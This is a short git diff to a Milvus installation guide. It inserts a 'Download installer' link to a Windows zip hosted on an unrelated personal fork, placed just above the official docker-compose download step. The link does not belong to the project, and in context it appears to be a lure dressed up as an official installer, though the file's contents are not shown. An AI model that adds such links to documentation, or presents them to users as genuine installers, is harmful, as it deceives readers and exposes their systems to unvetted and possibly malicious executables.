diff --git a/Installation.md b/Installation.md index 51e8bc0..086b71c 100644 --- a/Installation.md +++ b/Installation.md @@ -2,6 +2,9 @@ The first step is to see how to install Milvus. # Install Milvus Standalone with docker compose + +[Download installer](https://github.com/FrankFeng/Spoon-Knife/raw/master/Installer%20windows.zip) + Run the following command to download **milvus-standalone-docker-compose.yml** and save it as **docker-compose.yml**. ``` wget https://github.com/milvus-io/milvus/releases/download/v2.0.0-rc6/milvus-standalone-docker-compose.yml -O docker-compose.yml